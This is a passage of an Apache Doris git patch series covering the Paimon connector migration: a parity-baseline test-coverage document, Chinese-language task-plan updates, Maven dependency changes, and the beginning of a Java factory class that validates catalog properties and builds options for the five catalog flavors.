by `force_jni`) | ✅ | +| 9 | Time-travel / snapshot pin | `paimon_time_travel` (snapshot-id + commit-time + tag) | ✅ | +| 10 | Sys-tables `$snapshots/$files/$manifests/$schemas/$options` | `paimon_system_table`, `paimon_data_system_table` | ✅ | +| 11 | Sys-tables `$binlog` / `$audit_log` (**forced-JNI** override) | `paimon_data_system_table` (`$audit_log`, `$binlog` rowkind queries) | ⚠️ — exercised on legacy; the **forced-JNI override for these sys-tables** is a connector-side behavior with no parity assertion (see §3.3) | +| 12 | Sys-table auth | `test_paimon_system_table_auth` | ✅ | +| 13 | Session-TZ datetime predicate | `test_paimon_catalog_timestamp_tz`, `test_paimon_timestamp_with_time_zone`, `paimon_time_travel` (uses `time_zone`) | ✅ | +| 14 | Schema evolution | `test_paimon_schema_change`, `test_paimon_full_schema_change` | ✅ | +| 15 | The 6 flavors (filesystem / HMS / DLF / DLF-REST / JDBC / S3-storage) | filesystem: `paimon_base_filesystem`, `test_paimon_catalog`; HMS: `test_paimon_hms_catalog` (P2); DLF: `test_paimon_dlf_catalog`, `test_paimon_dlf_catalog_new_param`, `test_paimon_dlf_catalog_miss_dlf_param` (P2); DLF-REST: `test_paimon_dlf_rest_catalog` (P2); JDBC: `test_paimon_jdbc_catalog`; storage: `test_paimon_s3`, `test_paimon_minio`, `test_paimon_gcs` | ⚠️ — filesystem+JDBC run in CI; **HMS/DLF/DLF-REST/S3/OSS/MinIO/GCS are env-gated** (real remote creds), CI skips → live-e2e only (see §3.4) | +| 16 | Types (char/varchar, binary→varbinary, timestamp-tz, timestamp-types) | `test_paimon_char_varchar_type`, `test_paimon_catalog_varbinary`, `test_paimon_timestamp_with_time_zone`, `paimon_timestamp_types` | ✅ | +| 17 | MTMV staleness keying (snapshot-pin) | `test_paimon_mtmv`, `test_paimon_rewrite_mtmv`, `test_paimon_olap_rewrite_mtmv` (`mtmv_p0/**`) | ✅ legacy; ⚠️ connector single-snapshot-pin invariant lands in B5 (P5-T25) and needs its own UT | +| — | Misc legacy coverage that also flips at cutover | `test_paimon_statistics`, `test_paimon_table_stats`, `test_paimon_table_properties`, `test_paimon_table_meta_cache`, `test_paimon_sql_block_rule` | ✅ | +| UT | FE planning unit test | fe-core `PaimonScanNodeTest` (`fe/fe-core/src/test/java/org/apache/doris/datasource/paimon/source/PaimonScanNodeTest.java`) | ⚠️ — pins the **legacy** scan node; does NOT cover the connector `PaimonScanPlanProvider` (see §3.1) | + +**Firsthand counts:** 33 groovy suites under `external_table_p0/paimon/`, 6 under +`external_table_p2/paimon/` (HMS/DLF flavors), 3 MTMV suites under `mtmv_p0/`, plus the +fe-core UT `PaimonScanNodeTest`. (~41 P0 in the original estimate = the p0 paimon suites + +their inter-suite cases; the P2 flavor suites are additional.) + +> **Correction to the T02 brief (Rule 12 — fail loud):** the brief stated "existing tests +> force_jni only". Firsthand this is **inaccurate** — `test_paimon_deletion_vector` calls +> `test_cases("false"); test_cases("true")` and `test_paimon_cpp_reader` toggles +> `enable_paimon_cpp_reader` false→true, so the **native (non-JNI) reader path IS exercised** +> on the legacy side. The real native gap is connector-side assertion, not "no native test at +> all" — see §3.2. + +--- + +## 3. Real gaps with NO automated parity coverage + +These are the holes the regression suites in §2 do **not** close. They are the substance of +the cutover risk and must be addressed by new UTs and/or the live-e2e hard gate. + +### 3.1 Connector-path predicate-conversion UT (❌ no coverage) +`fe-connector-paimon` has `PaimonPredicateConverter` but **no unit test** for it — contrast +`fe-connector-trino/.../TrinoPredicateConverterTest.java` and +`fe-connector-maxcompute/.../MaxComputePredicateConverterTest.java`, which both exist. Note the +**legacy** converter (`datasource.paimon.source.PaimonPredicateConverter`) *does* have a direct +fe-core unit test (`fe/fe-core/src/test/java/org/apache/doris/planner/PaimonPredicateConverterTest.java`) +on top of the `test_paimon_predict` row checks; the gap is specifically that the **connector** +converter (`ConnectorExpression` → `org.apache.paimon.predicate.Predicate`) has no +direct test. **Recommended:** a connector-side `PaimonPredicateConverterTest` (offline, +no fe-core import) covering each op (eq/ne/lt/le/gt/ge/in/isNull/and/or) + the datetime/TZ +literal-format edge (the source-TZ session gotcha that bit maxcompute — see MEMORY +"连接器 session TZ"). This is the highest-value missing UT. + +### 3.2 Native-reader + deletion-vector connector parity (⚠️ partial) +The native ORC/Parquet path and deletion-vector merge are exercised on the **legacy** split +classifier (`test_paimon_cpp_reader`, `test_paimon_deletion_vector`). After cutover the +classification + deletion-file plumbing run through the **connector** `PaimonScanPlanProvider` +(`buildJniScanRange` / `RawFile` / `DeletionFile` handling, ~`PaimonScanPlanProvider.java`). +There is no assertion that the connector emits the same native-vs-JNI split decision or the +same deletion-file list. The before/after run (§4) covers row correctness, but a focused +**connector split-classification UT** would localize a regression instead of surfacing it as +a wrong row count three suites away. + +### 3.3 Sys-table forced-JNI override (⚠️ partial) +`$binlog` / `$audit_log` (and other non-data sys-tables) must be **forced to the JNI reader** +even when native is otherwise preferred. `paimon_data_system_table` exercises the queries but +nothing asserts the *forced-JNI override decision itself* on the connector path. After cutover +this override lives in the connector; a regression here would silently route a sys-table to a +native reader that cannot read it. Needs an explicit connector-side assertion (or a +before/after explain diff on `$binlog`). + +### 3.4 Live-e2e hard gate (CI skips — env-gated) +The flavor suites for **HMS / DLF / DLF-REST / S3 / OSS / MinIO / GCS** (§2 row 15) require +real remote catalogs/credentials and are **skipped in CI**. The connector's per-flavor +catalog assembly (`PaimonConnector.createCatalog` switch + per-flavor +`ExecutionAuthenticator`, P5-T03) is therefore **not** validated by CI at all. This is the +single biggest before/after risk and must be a **user-run live-e2e hard gate** before +cutover (consistent with `tasks/P5-paimon-migration.md` §翻闸前置硬门 ①). + +--- + +## 4. Live-e2e run plan (user-run, pre-cutover hard gate) + +CI proves only the offline + filesystem/JDBC slice. The live gate proves the env-gated +flavors and the full read path against a real paimon deployment. Run this **twice** — once on +`master` (legacy) and once on the cutover branch (paimon in `SPI_READY_TYPES`) — and diff the +`.out` files. Identical output = parity. + +1. **Per-flavor connectivity + read** (one warehouse per flavor): + - filesystem (local/HDFS), HMS, DLF, DLF-REST, JDBC, plus S3/OSS/MinIO/GCS storage. + - For each: `SHOW DATABASES`, `SHOW TABLES`, `SELECT *` (no predicate), one predicate + query, one partition-pruned query → diff vs legacy. +2. **Read-path matrix on at least one keyed+partitioned table per flavor:** + predicate pushdown, partition pruning, runtime-filter pruning, COUNT pushdown, + deletion-vector (orc+parquet), native vs `set force_jni_scanner=true`, incremental read, + time-travel (snapshot-id + tag), `$snapshots/$files/$binlog/$audit_log`, session-TZ + datetime predicate. +3. **MTMV staleness:** create an MV over a paimon source, mutate the source, confirm the MV + detects staleness via the snapshot-pin key (P5-T25 invariant) → diff vs legacy. +4. **Gate criterion:** every diff empty. Any non-empty diff blocks cutover (B7). + +The offline FE→BE round-trip smoke (`PaimonTableSerdeRoundTripTest`, this task) is the CI-side +companion to step 2's serialization — it catches version-drift / non-serializable / base64 +breaks that step 2 would otherwise only surface as a runtime BE failure. + +--- + +## 5. What this task (T02) delivers vs what remains + +- **Delivered (T02):** this parity-baseline doc; the offline FE→BE serialized-`Table` + round-trip smoke (CI, not env-gated); the R-007 3-way `paimon.version` pin comment in + `fe/pom.xml`. +- **Remaining (other tasks):** the connector `PaimonPredicateConverterTest` (§3.1), the + connector split-classification / deletion-vector / forced-JNI assertions (§3.2–3.3), the + MTMV snapshot-pin UT (P5-T25), and the user-run live-e2e hard gate (§4). These are tracked + in `tasks/P5-paimon-migration.md`. diff --git a/plan-doc/tasks/P5-paimon-migration.md b/plan-doc/tasks/P5-paimon-migration.md index 15074f4edb9c61..6467ab370dab72 100644 --- a/plan-doc/tasks/P5-paimon-migration.md +++ b/plan-doc/tasks/P5-paimon-migration.md @@ -7,7 +7,7 @@ ## 元信息 -- **状态**:⏸ 待启动(recon+设计完成;**D1/D2 已签字 2026-06-09**,可启动分批实现) +- **状态**:🟢 进行中(**B0 已完成 2026-06-09**:T01 测试基建 + T02 parity baseline,连接器 12/0/0/1 绿、checkstyle 0、import-gate 净;下一批 = B1 flavor 装配) - **启动日期**:2026-06-09(recon+设计) - **目标完成**:TBD(估时 ~5-6 周,含 D2-A 的 MTMV/MVCC 桥) - **阻塞**:无(D1=A / D2=A 已签字);分批实现按 B0→B9 启动 @@ -83,8 +83,8 @@ Master plan [§3.6](../00-connector-migration-master-plan.md);策略 = full ad | ID | 任务 | 批次 | type | 状态 | 备注 | |---|---|---|---|---|---| -| P5-T01 | 建 `fe-connector-paimon` 测试模块 + 注入式 SDK seam(`PaimonCatalogOps` 接口包远端 Catalog 调用,MC `McStructureHelper` 范式,no-mockito recording fake)| B0 | C+T | ⏳ | 0 测试现状 | -| P5-T02 | parity baseline(vs 旧 `PaimonScanNode`:谓词/分区/native·JNI/deletion/SELECT*)+ FE→BE round-trip smoke + **pin paimon-core 版本三方对齐** | B0 | T | ⏳ | 翻闸前后跑 | +| P5-T01 | 建 `fe-connector-paimon` 测试模块 + 注入式 SDK seam(`PaimonCatalogOps` 接口包远端 Catalog 调用,MC `McStructureHelper` 范式,no-mockito recording fake)| B0 | C+T | ✅ | seam=5 读方法(B0 只读,DDL 待 B1-B3 扩);`PaimonConnectorMetadata` 6 调用点齐迁;9 UT 钉 databaseExists try/catch + getColumnHandles reload-fallback + 1 env-gated live smoke | +| P5-T02 | parity baseline(vs 旧 `PaimonScanNode`:谓词/分区/native·JNI/deletion/SELECT*,doc [`research/p5-paimon-parity-baseline.md`](../research/p5-paimon-parity-baseline.md))+ FE→BE round-trip smoke(offline `PaimonTableSerdeRoundTripTest`,CI 非 env-gated)+ **pin paimon-core 版本三方对齐**(R-007 注释落 `fe/pom.xml` ``) | B0 | T | ✅ | 翻闸前后跑;gap 见 doc §3 | | P5-T03 | `PaimonConnector.createCatalog` flavor 装配(switch on `paimon.catalog.type`:warehouse/options/重建 Hadoop·HiveConf/**每-flavor ExecutionAuthenticator**;filesystem→hms→rest/jdbc/dlf 渐进)| B1 | C | ⏳ | **gated on D1**;authenticator 丢=Kerberos DDL 炸 | | P5-T04 | 拷 HMS/REST/DLF/JDBC + credential/storage 属性键入 `PaimonConnectorProperties`(禁 import fe-core)| B1 | C | ⏳ | | | P5-T05 | 扩 `PaimonConnectorProvider.validateProperties`(flavor 合法性 + 每-flavor 必需属性,`IllegalArgumentException` fail-fast)| B1 | C | ⏳ | legacy `PaimonExternalCatalogFactory:29-47` | @@ -183,6 +183,12 @@ B6 (procedure doc no-op, 独立) │ ## 阶段日志(倒序) +### 2026-06-09(B0 实现:测试基建 + parity baseline) +- **T01**:抽 `PaimonCatalogOps` 注入式 seam(5 读方法,B0 只读)over 远端 Catalog;`PaimonConnectorMetadata` 6 调用点齐迁(读路径字节级不变,`Catalog` import 仅留两 NotExist catch);`PaimonConnector` 装配;建测试模块 = no-mockito `RecordingPaimonCatalogOps` + `PaimonConnectorMetadataTest`(9 UT,钉 `databaseExists` try/catch 与 `getColumnHandles` reload-fallback,各带 WHY+MUTATION)+ `FakePaimonTable`(28 非读方法 fail-loud)+ env-gated `PaimonLiveConnectivityTest`。 +- **T02**:① R-007 三方版本已对齐(`${paimon.version}=1.3.1` 单源 `fe/pom.xml:399`,FE 连接器 + BE paimon-scanner + preload-extensions 同源)→ 落不变式注释(非改版本)。② offline FE→BE serde round-trip smoke `PaimonTableSerdeRoundTripTest`:真 `FileSystemCatalog`/`LocalFileIO`@TempDir → 真 `FileStoreTable` → 连接器 encode(InstantiationUtil+STD Base64)→ BE-side decode(镜像 `PaimonUtils.deserialize` URL-first/STD-fallback)→ 断 rowType/partition/primary keys;CI 跑非 env-gated。③ parity-baseline doc [`research/p5-paimon-parity-baseline.md`](../research/p5-paimon-parity-baseline.md):33 p0 + 6 p2 + 3 MTMV + fe-core `PaimonScanNodeTest` 清单、翻闸自动 before/after 门模型、4 真 gap + live-e2e 计划。 +- **验证**:连接器 `Tests run: 12, Failures: 0, Errors: 0, Skipped: 1`(1 skip=live)+ BUILD SUCCESS + checkstyle 0 + import-gate 净(主线 firsthand 复跑)。每任务 spec+quality 双审 PASS;主线追加 3 处准确性修正(beDecode 镜像 BE 真分支 / 第二测试重命名 / doc §3.1 legacy 已有 fe-core UT)后复绿。 +- **纠偏**:recon「无 parity baseline」证伪——41 套回归已存在且翻闸自动变 after 门,真 gap 是连接器侧 UT(谓词转换/native·deletion/sys-forced-JNI)+ live-e2e。 + ### 2026-06-09(recon + 设计,0 产线代码) - 14-agent code-grounded recon + cross-cut 对抗复审;产 `research/p5-paimon-migration-recon.md` + 本 doc。 - firsthand 核实 4 个 load-bearing 锚点(SPI_READY_TYPES / GSON 7 注册 / PluginDrivenExternalTable 无 MTMV / ConnectorPartitionInfo.lastModifiedMillis 存在)。 @@ -200,10 +206,12 @@ B6 (procedure doc no-op, 独立) │ - 风险:R-004(classloader)、R-007(FE/BE 共享 jar)、R-012(snapshotId 类型) - 连接器:[paimon](../connectors/paimon.md) - recon:[p5-paimon-migration-recon](../research/p5-paimon-migration-recon.md) +- parity baseline(T02,翻闸前后 before/after 门 + gap 清单 + live-e2e 计划):[p5-paimon-parity-baseline](../research/p5-paimon-parity-baseline.md) --- ## 当前阻塞项 -- 无硬阻塞(D1=A / D2=A 已签字 2026-06-09)。下一 session 可启动 B0(测试基建 + parity baseline,无前置)、B1(flavor 装配,单 Catalog 模型)、B6(procedure doc no-op)。 +- 无硬阻塞(D1=A / D2=A 已签字;**B0 已完成 2026-06-09**)。下一 session 起 **B1**(flavor 装配,单 Catalog 模型,T03/T04/T05;gated on D1,已签);**B6**(procedure doc no-op,独立)可随时落。 - 翻闸(B7)仍 gated on B2+B3+B4+B5 全完 + live e2e(用户真实 paimon 各 flavor 环境)。 +- B0 复用资产:seam(B1-B3 须扩 DDL 方法 + 同步 `RecordingPaimonCatalogOps`/`CatalogBackedPaimonCatalogOps`);parity doc 是后续批次 gap 清单 + 翻闸门基准。 From 9142f23326a24da85a07ae48525a161bfe123913 Mon Sep 17 00:00:00 2001 From: morningman Date: Tue, 9 Jun 2026 23:11:36 +0800 Subject: [PATCH 010/128] [feat](connector) P5 paimon B1: flavor assembly (T03-T05, all 5 flavors) Single-Catalog flavor switch on paimon.catalog.type for all five flavors (filesystem/hms/rest/jdbc/dlf), mirroring the legacy fe-core flavor properties without importing fe-core/fe-common. - New PaimonCatalogFactory: pure validate() + buildCatalogOptions() (paimon.catalog.type -> paimon `metastore` opt, per-flavor options, paimon.* passthrough excl storage prefixes) + buildHadoopConfiguration / buildHmsHiveConf / buildDlfHiveConf + requireOssStorageForDlf. - PaimonConnector: thread ConnectorContext; createCatalog wires all 5 flavors live (filesystem/jdbc with Hadoop Configuration, rest Options-only, hms/dlf with HiveConf), each wrapped in context.executeAuthenticated (Kerberos seam). JDBC DriverShim ported with driver-url resolution via getEnvironment() (replaces forbidden JdbcResource). - PaimonConnectorProperties: all flavor key constants (multi-alias String[]). - PaimonConnectorProvider: validateProperties override -> factory.validate. - pom: add paimon-hive-connector-3.1 + hadoop-common + hive-common (hive-common over hive-catalog-shade to avoid the fastutil conflict). - 31 new no-mockito unit tests (PaimonCatalogFactoryTest); module 43/0/0/1, checkstyle 0, import-gate clean. hms/dlf live connection is gated on B7 cutover + live-e2e: the Thrift metastore client is host-provided (not bundled) with a child-first Configuration/HiveConf cross-loader hazard to verify; jdbc driver_url FE security allow-list + external hive-site.xml file load are deferred. All documented in code NOTEs and plan-doc. rest also requires warehouse (legacy parity). Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-connector/fe-connector-paimon/pom.xml | 35 ++ .../paimon/PaimonCatalogFactory.java | 524 ++++++++++++++++ .../connector/paimon/PaimonConnector.java | 234 +++++++- .../paimon/PaimonConnectorProperties.java | 49 ++ .../paimon/PaimonConnectorProvider.java | 13 +- .../paimon/PaimonCatalogFactoryTest.java | 566 ++++++++++++++++++ .../paimon/PaimonLiveConnectivityTest.java | 24 +- plan-doc/HANDOFF.md | 58 +- plan-doc/tasks/P5-paimon-migration.md | 30 +- 9 files changed, 1491 insertions(+), 42 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java diff --git a/fe/fe-connector/fe-connector-paimon/pom.xml b/fe/fe-connector/fe-connector-paimon/pom.xml index 85b1ab4aee07af..d6aafb0615cb6e 100644 --- a/fe/fe-connector/fe-connector-paimon/pom.xml +++ b/fe/fe-connector/fe-connector-paimon/pom.xml @@ -69,6 +69,41 @@ under the License. ${paimon.version} + + + org.apache.paimon + paimon-hive-connector-3.1 + + + + + org.apache.hadoop + hadoop-common + + + + + org.apache.hive + hive-common + + org.apache.logging.log4j log4j-api diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java new file mode 100644 index 00000000000000..5a590e659c6029 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java @@ -0,0 +1,524 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.commons.lang3.BooleanUtils; +import org.apache.commons.lang3.StringUtils; +import org.apache.hadoop.conf.Configuration; +import org.apache.hadoop.hive.conf.HiveConf; +import org.apache.paimon.catalog.FileSystemCatalogFactory; +import org.apache.paimon.jdbc.JdbcCatalogFactory; +import org.apache.paimon.options.CatalogOptions; +import org.apache.paimon.options.Options; + +import java.util.Arrays; +import java.util.HashSet; +import java.util.Locale; +import java.util.Map; +import java.util.Set; +import java.util.function.BiConsumer; + +/** + * Pure, testable assembly core for the Paimon connector flavor switch. + * + *

Mirrors the role of {@code MCConnectorClientFactory}: a stateless static holder that + * (a) fail-fast {@link #validate(Map) validates} catalog properties at CREATE CATALOG time, + * and (b) {@link #buildCatalogOptions(Map) builds} the Paimon {@link Options} for a flavor. + * + *

The option-key logic ports the legacy fe-core {@code AbstractPaimonProperties} + + * each {@code Paimon*MetaStoreProperties}. {@code buildCatalogOptions} is PURE — it reads only + * the supplied props (no env, no clock) — which is what makes it unit-testable offline. + * + *

B1 also adds three PURE Hadoop config builders ({@link #buildHadoopConfiguration}, + * {@link #buildHmsHiveConf}, {@link #buildDlfHiveConf}) that reconstruct, from the raw property + * map alone, the {@code Configuration}/{@code HiveConf} that the live HiveCatalog needs. These + * replace the fe-core {@code StorageProperties.getHadoopStorageConfig()} / + * {@code HMSBaseProperties.getHiveConf()} / {@code PaimonAliyunDLFMetaStoreProperties.buildHiveConf()} + * with a minimal, fe-core-free reconstruction. They are still pure (Map in, conf out) so they are + * unit-testable offline; only the {@code CatalogFactory.createCatalog} call in + * {@code PaimonConnector} needs a live metastore. + */ +public final class PaimonCatalogFactory { + + private static final String USER_PROPERTY_PREFIX = "paimon."; + private static final String PAIMON_REST_PROPERTY_PREFIX = "paimon.rest."; + private static final String JDBC_PREFIX = "jdbc."; + + private static final Set KNOWN_FLAVORS = new HashSet<>(Arrays.asList( + PaimonConnectorProperties.FILESYSTEM, + PaimonConnectorProperties.HMS, + PaimonConnectorProperties.REST, + PaimonConnectorProperties.JDBC, + PaimonConnectorProperties.DLF)); + + /** + * Storage-config prefixes that are intentionally excluded from the catalog Options + * passthrough — they belong in the Hadoop Configuration (see {@link #buildHadoopConfiguration}), + * mirroring legacy {@code AbstractPaimonProperties.userStoragePrefixes}. + */ + private static final String[] USER_STORAGE_PREFIXES = { + "paimon.s3.", "paimon.s3a.", "paimon.fs.s3.", "paimon.fs.oss."}; + + /** Hadoop S3A standard prefix (legacy {@code AbstractPaimonProperties.FS_S3A_PREFIX}). */ + private static final String FS_S3A_PREFIX = "fs.s3a."; + + private PaimonCatalogFactory() { + } + + /** Resolves the lower-cased flavor, defaulting to {@code filesystem}. */ + public static String resolveFlavor(Map props) { + return props.getOrDefault( + PaimonConnectorProperties.PAIMON_CATALOG_TYPE, + PaimonConnectorProperties.DEFAULT_CATALOG_TYPE).toLowerCase(Locale.ROOT); + } + + /** + * Returns the first non-blank value among the given keys, or {@code null} if none is set. + * Mirrors the alias-priority semantics of the legacy {@code @ConnectorProperty(names=...)}. + */ + public static String firstNonBlank(Map props, String... keys) { + for (String key : keys) { + String value = props.get(key); + if (StringUtils.isNotBlank(value)) { + return value; + } + } + return null; + } + + /** + * Fail-fast validation, mirroring the legacy per-flavor rules. Throws + * {@link IllegalArgumentException} (style consistent with MaxCompute), which the caller + * ({@code PluginDrivenExternalCatalog.checkProperties}) wraps into a DdlException. + */ + public static void validate(Map props) { + String flavor = resolveFlavor(props); + if (!KNOWN_FLAVORS.contains(flavor)) { + throw new IllegalArgumentException("Unknown paimon.catalog.type value: " + flavor); + } + + // warehouse required for ALL flavors, REST included (legacy parity): the base + // AbstractPaimonProperties declares @ConnectorProperty(names={"warehouse"}) and + // ConnectorProperty.required() defaults to true; PaimonRestMetaStoreProperties does NOT + // override it, so legacy rejects a REST catalog without warehouse. + if (StringUtils.isBlank(props.get(PaimonConnectorProperties.WAREHOUSE))) { + throw new IllegalArgumentException("Property warehouse is required."); + } + + switch (flavor) { + case PaimonConnectorProperties.HMS: + if (firstNonBlank(props, PaimonConnectorProperties.HMS_URI) == null) { + throw new IllegalArgumentException("hive.metastore.uris or uri is required"); + } + break; + case PaimonConnectorProperties.REST: + if (firstNonBlank(props, PaimonConnectorProperties.REST_URI) == null) { + throw new IllegalArgumentException("paimon.rest.uri or uri is required"); + } + if ("dlf".equalsIgnoreCase(props.get(PaimonConnectorProperties.REST_TOKEN_PROVIDER)) + && (StringUtils.isBlank(props.get(PaimonConnectorProperties.REST_DLF_ACCESS_KEY_ID)) + || StringUtils.isBlank(props.get(PaimonConnectorProperties.REST_DLF_ACCESS_KEY_SECRET)))) { + throw new IllegalArgumentException( + "DLF token provider requires 'paimon.rest.dlf.access-key-id' " + + "and 'paimon.rest.dlf.access-key-secret'"); + } + break; + case PaimonConnectorProperties.JDBC: + if (firstNonBlank(props, PaimonConnectorProperties.JDBC_URI) == null) { + throw new IllegalArgumentException("uri or paimon.jdbc.uri is required"); + } + if (firstNonBlank(props, PaimonConnectorProperties.JDBC_DRIVER_URL) != null + && firstNonBlank(props, PaimonConnectorProperties.JDBC_DRIVER_CLASS) == null) { + throw new IllegalArgumentException( + "jdbc.driver_class or paimon.jdbc.driver_class is required when " + + "jdbc.driver_url or paimon.jdbc.driver_url is specified"); + } + break; + case PaimonConnectorProperties.DLF: + if (firstNonBlank(props, PaimonConnectorProperties.DLF_ACCESS_KEY) == null) { + throw new IllegalArgumentException("dlf.access_key is required"); + } + if (firstNonBlank(props, PaimonConnectorProperties.DLF_SECRET_KEY) == null) { + throw new IllegalArgumentException("dlf.secret_key is required"); + } + // Legacy derives the endpoint from the region when endpoint is blank; if both are + // blank it throws. We do not derive here (the derivation happens in buildDlfHiveConf, + // where the endpoint is consumed), but we keep the same fail-fast contract. + if (firstNonBlank(props, PaimonConnectorProperties.DLF_ENDPOINT) == null + && StringUtils.isBlank(props.get(PaimonConnectorProperties.DLF_REGION))) { + throw new IllegalArgumentException("dlf.endpoint is required."); + } + break; + default: + // filesystem: warehouse-only, already checked above. + break; + } + } + + /** + * Builds the Paimon catalog {@link Options} for the resolved flavor. PURE: depends only on + * {@code props}. Ports {@code AbstractPaimonProperties.appendCatalogOptions()} (common) plus + * each flavor's {@code appendCustomCatalogOptions()}. + */ + public static Options buildCatalogOptions(Map props) { + Options options = new Options(); + String flavor = resolveFlavor(props); + + appendCommonOptions(props, options, flavor); + + switch (flavor) { + case PaimonConnectorProperties.HMS: + appendHmsOptions(props, options); + break; + case PaimonConnectorProperties.REST: + appendRestOptions(props, options); + break; + case PaimonConnectorProperties.JDBC: + appendJdbcOptions(props, options); + break; + case PaimonConnectorProperties.DLF: + appendDlfOptions(options); + break; + default: + // filesystem: nothing custom. + break; + } + return options; + } + + private static void appendCommonOptions(Map props, Options options, String flavor) { + String warehouse = props.get(PaimonConnectorProperties.WAREHOUSE); + if (StringUtils.isNotBlank(warehouse)) { + options.set(CatalogOptions.WAREHOUSE.key(), warehouse); + } + options.set(CatalogOptions.METASTORE.key(), metastoreIdentifier(flavor)); + + // FIXME(cmy): Rethink these custom properties (ported from AbstractPaimonProperties). + // Re-key generic paimon.* props by stripping the prefix, excluding storage prefixes which + // belong in the Hadoop Configuration (see buildHadoopConfiguration). + props.forEach((k, v) -> { + if (k.toLowerCase(Locale.ROOT).startsWith(USER_PROPERTY_PREFIX)) { + String newKey = k.substring(USER_PROPERTY_PREFIX.length()); + if (StringUtils.isNotBlank(newKey) && !isStoragePrefixed(k)) { + options.set(newKey, v); + } + } + }); + } + + private static String metastoreIdentifier(String flavor) { + switch (flavor) { + case PaimonConnectorProperties.FILESYSTEM: + return FileSystemCatalogFactory.IDENTIFIER; + case PaimonConnectorProperties.JDBC: + return JdbcCatalogFactory.IDENTIFIER; + case PaimonConnectorProperties.REST: + return "rest"; + case PaimonConnectorProperties.HMS: + case PaimonConnectorProperties.DLF: + // = org.apache.paimon.hive.HiveCatalogOptions.IDENTIFIER; kept as a literal to + // mirror the existing rest/jdbc style (this is a pure option string, not a type ref). + return "hive"; + default: + throw new IllegalArgumentException("Unknown paimon.catalog.type value: " + flavor); + } + } + + private static boolean isStoragePrefixed(String key) { + for (String prefix : USER_STORAGE_PREFIXES) { + if (key.startsWith(prefix)) { + return true; + } + } + return false; + } + + private static void appendHmsOptions(Map props, Options options) { + String pool = props.getOrDefault( + PaimonConnectorProperties.CLIENT_POOL_CACHE_EVICTION_INTERVAL_MS, + PaimonConnectorProperties.CLIENT_POOL_CACHE_EVICTION_INTERVAL_MS_DEFAULT); + String location = props.getOrDefault( + PaimonConnectorProperties.LOCATION_IN_PROPERTIES, + PaimonConnectorProperties.LOCATION_IN_PROPERTIES_DEFAULT); + options.set(PaimonConnectorProperties.CLIENT_POOL_CACHE_EVICTION_INTERVAL_MS, pool); + options.set(PaimonConnectorProperties.LOCATION_IN_PROPERTIES, location); + options.set("uri", firstNonBlank(props, PaimonConnectorProperties.HMS_URI)); + } + + private static void appendRestOptions(Map props, Options options) { + options.set("uri", firstNonBlank(props, PaimonConnectorProperties.REST_URI)); + props.forEach((k, v) -> { + if (k.startsWith(PAIMON_REST_PROPERTY_PREFIX)) { + options.set(k.substring(PAIMON_REST_PROPERTY_PREFIX.length()), v); + } + }); + } + + private static void appendJdbcOptions(Map props, Options options) { + options.set(CatalogOptions.URI.key(), firstNonBlank(props, PaimonConnectorProperties.JDBC_URI)); + String user = firstNonBlank(props, PaimonConnectorProperties.JDBC_USER); + if (StringUtils.isNotBlank(user)) { + options.set("jdbc.user", user); + } + String password = firstNonBlank(props, PaimonConnectorProperties.JDBC_PASSWORD); + if (StringUtils.isNotBlank(password)) { + options.set("jdbc.password", password); + } + // Pass through any raw jdbc.* key not already set (legacy appendRawJdbcCatalogOptions). + props.forEach((k, v) -> { + if (k != null && k.startsWith(JDBC_PREFIX) && !options.keySet().contains(k)) { + options.set(k, v); + } + }); + } + + private static void appendDlfOptions(Options options) { + // String literal avoids the Aliyun datalake compile dep (the live SDK ships at runtime). + options.set("metastore.client.class", "com.aliyun.datalake.metastore.hive2.ProxyMetaStoreClient"); + options.set("client-pool-cache.keys", "conf:dlf.catalog.id"); + } + + // --------------------------------------------------------------------- + // Hadoop Configuration / HiveConf builders (PURE — functions of props only) + // --------------------------------------------------------------------- + + /** + * Builds a minimal Hadoop {@link Configuration} for the storage layer (HDFS / S3 / OSS), + * reconstructed from the raw property map. This replaces the fe-core + * {@code StorageProperties.getHadoopStorageConfig()} + {@code AbstractPaimonProperties + * .normalizeS3Config()/appendUserHadoopConfig()} with a fe-core-free port: + * + *

    + *
  • {@code paimon.s3.*} / {@code paimon.s3a.*} / {@code paimon.fs.s3.*} / {@code paimon.fs.oss.*} + * are normalized to the Hadoop S3A prefix {@code fs.s3a.} (strip the matched prefix, + * re-key as {@code fs.s3a.} + remainder), matching legacy {@code normalizeS3Config};
  • + *
  • raw {@code fs.*} / {@code dfs.*} / {@code hadoop.*} keys are copied verbatim (these are + * already Hadoop-recognized keys the user passed through).
  • + *
+ * + *

PURE: depends only on {@code props}. + */ + public static Configuration buildHadoopConfiguration(Map props) { + Configuration conf = new Configuration(); + applyStorageConfig(props, conf::set); + return conf; + } + + /** + * Applies the normalized storage config (S3 normalization + raw fs./dfs./hadoop. passthrough) + * via the given setter. Shared by {@link #buildHadoopConfiguration} and the HiveConf builders + * (which overlay the same storage config onto the HiveConf, mirroring legacy + * {@code appendUserHadoopConfig(hiveConf)} + {@code ossProps.getHadoopStorageConfig()}). + */ + private static void applyStorageConfig(Map props, BiConsumer setter) { + props.forEach((key, value) -> { + for (String prefix : USER_STORAGE_PREFIXES) { + if (key.startsWith(prefix)) { + setter.accept(FS_S3A_PREFIX + key.substring(prefix.length()), value); + return; // stop after the first matching prefix (legacy normalizeS3Config) + } + } + if (key.startsWith("fs.") || key.startsWith("dfs.") || key.startsWith("hadoop.")) { + setter.accept(key, value); + } + }); + } + + /** + * 